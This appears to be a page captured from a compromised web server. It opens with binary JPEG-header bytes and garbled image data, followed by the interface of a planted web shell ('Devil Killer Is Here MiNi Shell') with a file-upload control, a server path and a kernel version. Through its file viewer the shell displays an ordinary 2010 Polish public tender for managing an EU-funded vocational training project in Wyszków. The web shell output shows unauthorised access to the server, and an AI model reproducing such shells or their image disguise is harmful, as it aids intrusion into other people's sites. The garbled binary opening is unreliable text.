JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/189928-N-2010.html

<p class="kh_header"><b>Wyszków: Zarządzanie projektem pn. Dobry zawód - dobra praca</b><br>
<b>Numer ogłoszenia: 189928 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kształcenia Praktycznego w Wyszkowie , Ul. I Armii Wojska Polskiego 82 A, 07-200 Wyszków, woj. mazowieckie, tel. 29 742 48 06, faks 29 742 48 06.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckpwyszkow.repulika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie projektem pn. Dobry zawód - dobra praca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wspólny Słownik Zamówień (CPV) - 79.42.10.00-1 - usługi zarządzania projektem, inne niż w zakresie robót budowlanych..
1. Zamówienie obejmuje w ramach usługi zarządzanie projektem pn. Dobry zawód - dobra praca pełnienie funkcji Kierownika(czki) Projektu, Koordynator(ka) ds. kursów i szkoleń, Specjalista(ska) ds. obsługi finansowej. Na podstawie Umowy zlecenia (dotyczy wszystkich).
2. Zamówienie, o którym mowa w ust. 1 obejmuje: 
1) Część nr 1:
ZADANIA KIEROWNIK(CZKA) PROJEKTU
Kierowanie wykonaniem projektu w formie nadzoru merytorycznego i finansowego zgodnie z harmonogramem realizacji projektu. Kierownik(czka) odpowiedzialny(a) będzie za merytoryczny nadzór nad wykonaniem wszystkich zadań w projekcie, weryfikację przygotowanych wniosków o płatność wraz z częścią sprawozdawczą, realizację kursów i szkoleń zgodnie z harmonogramem rzeczowo-finansowym projektu (wykonywanie obowiązków związanych z realizacją i nadzorem nad prawidłową realizacją projektu).
Wykonawca zobowiązany jest do realizacji zadań zapewniających wykonanie projektu w tym: 
a) nadzoru nad całością prac związanych z realizacją projektu i ich jakością, nad personelem projektu, 
b) bieżącego kontaktu z Instytucją Pośredniczącą i innymi organizacjami lub instytucjami zaangażowanymi bezpośrednio lub pośrednio przy realizacji projektu, 
c) nawiązania współpracy i nadzoru nad pracą wykonawców zadań, 
d) doradztwo prawne, 
e) komunikację z personelem, 
f) rekrutację BO do projektu, 
g) dobór specjalistów i nauczycieli do prowadzenia zajęć pozalekcyjnych, 
h) zatwierdzanie płatności w zakresie merytorycznym, 
i) odbiór wykonywanej pracy przez specjalistów i nauczycieli , 
j) zapewnienia terminowej realizacji zadań wynikających z harmonogramu realizacji projektu, sprawowania całościowego nadzoru nad realizacją projektu, 
k) zarządzania planowanymi działaniami projektowymi, 
l) kontakt z mediami, 
m) prowadzenia dokumentacji projektowej w oparciu o obowiązujące zapisy, 
n) organizacji i monitoringu zadań wynikających z wniosku i harmonogramu projektu, 
o) organizacji dodatkowych elementów związanych z realizacja zajęć przewidzianych w ramach projektu, 
p) nadzoru nad bieżącą dokumentacją projektu, 
q) dokonywania systematycznej kontroli pracy i uzyskanych efektów, 
r) wprowadzania zmian do projektu w oparciu o obowiązujące zapisy zawarte                     w dokumentacji konkursowej, umowie o dofinansowanie projektu, dokumentach programowych Programu Operacyjnego Kapitał Ludzki, 
s) reprezentowania projektu na zewnątrz, 
t) akceptacji wniosków o płatność, 
u) kontroli i nadzoru nad monitoringiem realizacji projektu oraz sprawozdawczością (kontrola terminów) w oparciu o obowiązujące zapisy w dokumentach programowych Programu Operacyjnego Kapitał Ludzki. 
Wykonywanie zleconych zadań odbywać się będzie w Centrum Kształcenia Praktycznego w Wyszkowie, w godzinach ustalonych z Zamawiającym                                  i dostosowanych do potrzeb Beneficjentów Ostatecznych Projektu.
Zamawiający zapewnia wykonawcy: pomieszczenie biurowe, dostępność podstawowego sprzętu biurowego (m.in. telefon, drukarka), dostęp do Internetu, podstawowe materiały biurowe do druku i korespondencji.
2) Część nr 2:
ZADANIA KOORDYNATOR(KA)  DS. KURSÓW I SZKOLEŃ
Odpowiedzialny(a) za zapewnienie wysokiej jakości programów szkoleniowych, nadzór nad prawidłową realizacją procesu szkoleń, układaniem harmonogramu zajęć, współpracę z wykładowcami i instruktorami, nadzór nad merytorycznym poziomem  programów  kursów(szkoleń), analizę poziomu frekwencji uczestników oraz podejmowanie wraz z kierownikiem(czką) projektu ewentualnych działań prewencyjnych i zaradczych w tym zakresie. 
Ponadto wykonawca zobowiązany jest do realizacji zadań: 
a) przygotowywanie spotkań informacyjnych, 
b) treści materiałów promocyjnych, 
c) odpowiedzialność za ankietyzację oraz przygotowanie materiałów do podsumowania projektu.
Wykonywanie zleconych zadań odbywać się będzie w Centrum Kształcenia Praktycznego w Wyszkowie, w godzinach ustalonych z Zamawiającym i dostosowanych do potrzeb Beneficjentów Ostatecznych Projektu.
W przypadku kolizji świadczeń, świadczenie na rzecz zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. 
Zamawiający zapewnia wykonawcy: pomieszczenie biurowe, dostępność podstawowego sprzętu biurowego (m.in. telefon, drukarka), dostęp do Internetu, podstawowe materiały biurowe do druku i korespondencji. 
3) Część nr 3:
ZADANIA SPECJALISTY(STKI) DS. OBSŁUGI FINANSOWEJ
Odpowiedzialny(a) za prawidłowość rozliczeń finansowych, przygotowanie wniosków o płatność, opracowanie dokumentów finansowych, sporządzanie harmonogramów płatności.
Ponadto wykonawca zobowiązany jest do realizacji zadań: 
a) obsługa kadrowo-płacowa oraz ewidencja umów 
b) monitoring postępów realizacji projektu, 
c) prowadzenia sprawozdawczości projektu, 
d) składaniu i wypełniani wniosków o płatność, 
e) obsługa GWP, wnioskowanie o zmiany, 
f) bieżący kontakt z IW (poprawki).
Wykonywanie zleconych zadań odbywać się będzie w Centrum Kształcenia Praktycznego w Wyszkowie, w godzinach ustalonych z Zamawiającym i dostosowanych do potrzeb Beneficjentów Ostatecznych Projektu.
W przypadku kolizji świadczeń, świadczenie na rzecz zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. 
Zamawiający zapewnia wykonawcy: pomieszczenie biurowe, dostępność podstawowego sprzętu biurowego (m.in. telefon, drukarka), dostęp do Internetu, podstawowe materiały biurowe do druku i korespondencji. 
3. Zamówienie współfinansowane jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
4. Informacje na temat projektu Powiatu Wyszkowskiego pn. Dobry zawód - dobra praca.
5. Projekt Powiatu Wyszkowskiego pn.: Dobry zawód - dobra praca będzie dofinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. 
CELEM OGÓLNYM PROJEKTU jest poniesienie kwalifikacji zawodowych 177 uczniów i 73 uczennic z terenu powiatu wyszkowskiego w okresie do 30 sierpnia 2012 r. poprzez wdrożenie programu przedsiębiorczej szkoły.
Wsparciem objęci zostaną uczniowie szkół i placówek oświatowych prowadzących kształcenie zawodowe z terenu powiatu wyszkowskiego:
- Zespół Szkół w Długosiodle, 
- Zespół Szkół im. Władysława Stanisława Reymonta w Zabrodziu,
- Zespół Szkół Nr 1 im. Marii Skłodowskiej - Curie w Wyszkowie, 
- Zespół Szkół Nr 2 w Wyszkowie.
Działania w projekcie obejmują realizację 15 ZADAŃ (kursy kwalifikacyjne i szkolenia interpersonalne):
a) Kurs spawania metodą MAG i TIG dla 80 osób - 2 800 godz. - 8 edycji
b) Kurs operator wózków jezdniowych dla 60 osób)- 1 410 godz. - 6 edycji
c) Kurs fryzjerski dla 50 osób - 790 godz. - 5 edycji
d) Kurs SEP do 1 kV dla 40 osób - 300 godz. - 4 edycje
e) Kurs kosmetyczny wraz ze stylizacją paznokci i wizażu dla 20 osób - 400 godz. - 2 edycje
f) Kurs język angielski zawodowy dla spawaczy dla 80 - 400 godz.  8 edycji
g) Kurs język angielski zawodowy fryzjerski dla 50 osób - 250 godz. - 5 edycji
h) Szkolenie - Równe szanse w szkole dla 250 osób - uczniowie - 90 godz. - 15 edycji
i) Szkolenie - Radzenie sobie ze stresem dla 80 osób - 16 godz. - 2 edycje
j) Szkolenie - Równe szanse w szkole dla 5 osób - nauczyciele - 12 godz. - 1 edycja
k) Szkolenie - Trening kreatywnego myślenia dla 50 osób - 16 godz.  - 2 edycje
l) Szkolenie - Pozytywna komunikacja w pracy dla 50 osób - 12 godz. - 2 edycje
m) Kurs przedsiębiorczości dla 100 osób - 100 godz. - 5 edycji
Projekt będzie realizowany przez Centrum Kształcenia Praktycznego w Wyszkowie (CKP  w Wyszkowie).
Wartość projektu: 1 459 509,00 zł brutto.
5. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. W takim przypadku Wykonawca jest obowiązany w Formularzu ofertowym wskazać te części zamówienia, które powierzy podwykonawcom.
6. Wymagania stawiane Wykonawcy:
1) Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
2) Wykonawca jest zobowiązany do:
a) zdobycia wszelkich informacji niezbędnych do prawidłowego przygotowania oferty, sprawdzenia i zweryfikowania dostarczonych materiałów oraz niezwłocznego poinformowania Zamawiającego o ewentualnych błędach lub przeoczeniach;
b) Zamawiający nie będzie uwzględniał żadnych roszczeń i uwag z tytułu błędów lub  nieścisłości specyfikacji istotnych warunków zamówienia po upływie terminu zgłaszania uwag; Wykonawca będzie zobowiązany do wykonania zamówienia zgodnie ze wzorem umowy stanowiącym załącznik nr 4 do niniejszej specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie do wykonania tego zamówienia tj. wykazać, że:
Część nr 1
KIEROWNIK(CZKA) PROJEKTU
- posiada doświadczenie w zarządzaniu co najmniej jednym projektem (innym niż przedmiotowy) o charakterze edukacyjnym finansowanymi ze środków Unii Europejskiej na stanowisku Kierownika Projektu lub Koordynatora o wartości projektu nie mniej niż 100.000,00 zł, lub brał(bierze) udział w obsłudze zarządzania projektem o wartości wskazanej wyżej,
Część nr 2
KOORDYNATOR(KA) DS. KURSÓW I SZKOLEŃ
- posiada doświadczenie w realizacji co najmniej jednego projektu (innego niż przedmiotowy) o charakterze edukacyjnym finansowanymi ze środków Unii Europejskiej,
Część nr 3
SPECJALISTA (STKA) DS. OBSŁUGI FINANSOWEJ
- posiada doświadczenie w realizacji co najmniej jednego projektu (innego niż przedmiotowy) o charakterze edukacyjnym finansowanymi ze środków Unii Europejskiej,
Ocena tego warunku będzie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia tj.: 
- Część nr 1
KIEROWNIK(CZKA) PROJEKTU 
- posiada wykształcenie wyższe, preferowane w kierunku zarządzanie, a także posiada znajomość obsługi komputera, w tym MS Office i stron internetowych
Część nr 2
KOORDYNATOR(KA) DS. KURSÓW I SZKOLEŃ
- posiada wykształcenie wyższe, preferowane w kierunku zarządzanie działalnością edukacyjną lub pedagogika, a także posiada znajomość obsługi komputera, w tym MS Office i stron internetowych
Część nr 3
SPECJALISTA (STKA) DS. OBSŁUGI FINANSOWEJ
- posiada wykształcenie wyższe, preferowane w zakresie ekonomii, a także posiada znajomość obsługi komputera, w tym MS Office i stron internetowych
- posiada znajomość zasad i procedur realizacji projektów finansowanych lub współfinansowanych przez EFS, a także znajomość obsługi Generatora Wniosków o Płatność.
Ocena tego warunku będzie dokonana wg formuły spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności musi dysponować środkami finansowymi niezbędnymi do realizacji zamówienia.
Ocena tego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - zał. Nr 1 do SIWZ,
Życiorys</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Jak w zał.  Nr 4 do SIWZ - wzór umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ckpwyszkow.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> CKP Wyszków , ul. I Armii Wojska Polskiego 82a, 07-200 Wyszków Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 11:00, miejsce: CKP Wyszków , ul. I Armii Wojska Polskiego 82a, 07-200 Wyszków Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KIEROWNIK/CZKA PROJEKTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kierowanie wykonaniem projektu w formie nadzoru merytorycznego i finansowego zgodnie z harmonogramem realizacji projektu. Kierownik(czka) odpowiedzialny(a)będzie za merytoryczny nadzór nad wykonaniem wszystkich zadań w projekcie, weryfikację przygotowanych wniosków o płatność wraz z częścią sprawozdawczą, realizację kursów i szkoleń zgodnie z harmonogramem rzeczowo-finansowym projektu (wykonywanie obowiązków związanych z realizacją i nadzorem nad prawidłową realizacją projektu).
Wykonawca zobowiązany jest do realizacji zadań zapewniających wykonanie projektu w tym: 
a) nadzoru nad całością prac związanych z realizacją projektu i ich jakością, nad personelem projektu, 
b)	bieżącego kontaktu z Instytucją Pośredniczącą i innymi organizacjami lub instytucjami zaangażowanymi bezpośrednio lub pośrednio przy realizacji projektu, 
c) nawiązania współpracy i nadzoru nad pracą wykonawców zadań, 
d) doradztwo prawne, 
e) komunikację z personelem, 
f) rekrutację BO do projektu, 
g) dobór specjalistów i nauczycieli do prowadzenia zajęć pozalekcyjnych, 
h) zatwierdzanie płatności w zakresie merytorycznym, 
i) odbiór wykonywanej pracy przez specjalistów i nauczycieli , 
j) zapewnienia terminowej realizacji zadań wynikających z harmonogramu realizacji projektu, sprawowania całościowego nadzoru nad realizacją projektu, 
k) zarządzania planowanymi działaniami projektowymi, 
l) kontakt z mediami, 
m) prowadzenia dokumentacji projektowej w oparciu o obowiązujące zapisy, 
n) organizacji i monitoringu zadań wynikających z wniosku i harmonogramu projektu, 
o) organizacji dodatkowych elementów związanych z realizacja zajęć przewidzianych w ramach projektu, 
p) nadzoru nad bieżącą dokumentacją projektu, 
q) dokonywania systematycznej kontroli pracy i uzyskanych efektów, 
r) wprowadzania zmian do projektu w oparciu o obowiązujące zapisy zawarte                     w dokumentacji konkursowej, umowie o dofinansowanie projektu, dokumentach programowych Programu Operacyjnego Kapitał Ludzki, 
s) reprezentowania projektu na zewnątrz, 
t) akceptacji wniosków o płatność, 
u) kontroli i nadzoru nad monitoringiem realizacji projektu oraz sprawozdawczością (kontrola terminów) w oparciu o obowiązujące zapisy w dokumentach programowych Programu Operacyjnego Kapitał Ludzki. 
